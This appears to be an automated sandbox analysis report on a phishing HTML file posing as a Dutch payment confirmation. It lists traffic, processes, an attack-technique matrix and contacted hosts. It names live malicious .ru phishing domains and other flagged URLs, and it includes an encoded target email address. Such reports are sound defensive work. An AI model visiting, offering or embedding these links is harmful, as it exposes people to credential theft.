    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 10:43:17 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: tG95QSdc9lfbiIiJPEllIbEZt0sNKDZYM2U=$2pypJPnpI161V2pHServer: cloudflareCF-RAY: 8f46ca6f79ab7c6c-EWRalt-svc: h3=":443"; ma=86400
    Source: chromecache_86.2.dr, chromecache_77.2.drString found in binary or memory: http://knockoutjs.com/
    Source: chromecache_86.2.dr, chromecache_77.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
    Source: NieuwBetalingsbevestigingvoor vanas.eu.htmString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
    Source: chromecache_86.2.dr, chromecache_77.2.drString found in binary or memory: https://github.com/douglascrockford/JSON-js
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: classification engineClassification label: mal80.phis.evad.winHTM@19/32@34/14
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\NieuwBetalingsbevestigingvoor vanas.eu.htm
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1896,i,10602721750565109592,8126371862419672758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1896,i,10602721750565109592,8126371862419672758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

    Data Obfuscation

    barindex
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru/rifemmklbecuphbjrjeRTfCOGHZFAYPELGXUEIIXJOALOEESXDWBBXBXNQOZYWLKJDTFOBXSCLPRJQOJI100%Avira URL Cloudmalware
    https://tt6l.xentore.ru/eH4dlw0/0%Avira URL Cloudsafe
    file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru
    104.21.32.251
    truefalse
      high
      tt6l.xentore.ru
      172.67.131.254
      truetrue
        unknown
        code.jquery.com
        151.101.194.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              sni1gl.wpc.omegacdn.net
              152.199.21.175
              truefalse
                high
                www.google.com
                142.250.181.100
                truefalse
                  high
                  word.office.com
                  unknown
                  unknownfalse
                    high
                    www.microsoft365.com
                    unknown
                    unknownfalse
                      high
                      identity.nel.measure.office.net
                      unknown
                      unknownfalse
                        high
                        aadcdn.msftauth.net
                        unknown
                        unknownfalse
                          high
                          login.microsoftonline.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f46c9ee5ddec342/1734604981425/pRF8XJBISw1z0s_false
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                high
                                https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f46c9ee5ddec342&lang=autofalse
                                    high
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWvfalse
                                        high
                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/false
                                            high
                                            file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=true
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://tt6l.xentore.ru/eH4dlw0/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f46c9ee5ddec342/1734604981423/a5a29d9b2856db968f9f890dd33a75bcd59170870ad9f80b9391466e460beb8e/nVUMjn0PcCLbXFvfalse
                                              high
                                              https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.jsfalse
                                                high
                                                https://bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru/rifemmklbecuphbjrjeRTfCOGHZFAYPELGXUEIIXJOALOEESXDWBBXBXNQOZYWLKJDTFOBXSCLPRJQOJIfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.opensource.org/licenses/mit-license.php)chromecache_86.2.dr, chromecache_77.2.drfalse
                                                  high
                                                  http://knockoutjs.com/chromecache_86.2.dr, chromecache_77.2.drfalse
                                                    high
                                                    https://github.com/douglascrockford/JSON-jschromecache_86.2.dr, chromecache_77.2.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.17.24.14
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.18.94.41
                                                      challenges.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.21.32.251
                                                      bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ruUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      172.67.131.254
                                                      tt6l.xentore.ruUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      104.18.95.41
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      142.250.181.100
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      151.101.130.137
                                                      unknownUnited States
                                                      54113FASTLYUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      152.199.21.175
                                                      sni1gl.wpc.omegacdn.netUnited States
                                                      15133EDGECASTUSfalse
                                                      151.101.194.137
                                                      code.jquery.comUnited States
                                                      54113FASTLYUSfalse
                                                      104.17.25.14
                                                      cdnjs.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      IP
                                                      192.168.2.17
                                                      192.168.2.16
                                                      192.168.2.4
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1578182
                                                      Start date and time:2024-12-19 11:42:07 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 4m 7s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:NieuwBetalingsbevestigingvoor vanas.eu.htm
                                                      Detection:MAL
                                                      Classification:mal80.phis.evad.winHTM@19/32@34/14
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .htm
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.162.84, 142.250.181.10, 142.250.181.142, 13.107.6.156, 20.190.147.9, 20.190.147.10, 20.190.147.8, 20.190.147.4, 20.190.177.20, 20.190.177.22, 20.190.177.149, 20.190.177.83, 23.32.238.168, 23.32.238.169, 23.32.238.185, 23.32.238.225, 23.32.238.211, 172.217.17.35, 23.32.238.209, 23.32.238.218, 23.32.238.227, 23.35.236.109, 172.202.163.200
                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, www.tm.ak.prd.aadg.akadns.net, b-0004.b-msedge.net, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, nel.measure.office.net.edgesuite.net, update.googleapis.com, login.mso.msidentity.com, clients.l.google.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      No simulations
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                                      • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                                      http://vtaurl.comGet hashmaliciousUnknownBrowse
                                                      • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                                      http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                                      • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                                      104.18.94.41https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                        https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                          vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                            https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                              https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                  DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                    http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                      https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                        http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                                          104.21.32.251https://uvcr.ovactanag.ru/jQXv/Get hashmaliciousUnknownBrowse
                                                                            https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                              https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                  https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09Get hashmaliciousUnknownBrowse
                                                                                    Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                                                      http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.comGet hashmaliciousUnknownBrowse
                                                                                        https://docs.google.com/presentation/d/e/2PACX-1vQdSuwONgWFnuoaK9jWkn4a4T1fFD4ixA3V2X7f5aWnD4sHxk2b10z2j2TMxkq3G15FQX3bbwReJ2PF/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                          Demande de proposition du Accueil-Parrainage Outaouais.pdfGet hashmaliciousUnknownBrowse
                                                                                            172.67.131.254Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              104.18.95.41https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                  vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                                    https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                                                      https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                                        https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                                                            DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                              http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                                                https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  code.jquery.comhttps://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.2.137
                                                                                                                  https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.66.137
                                                                                                                  vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.130.137
                                                                                                                  https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.194.137
                                                                                                                  https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.2.137
                                                                                                                  https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 151.101.66.137
                                                                                                                  https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.66.137
                                                                                                                  A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.66.137
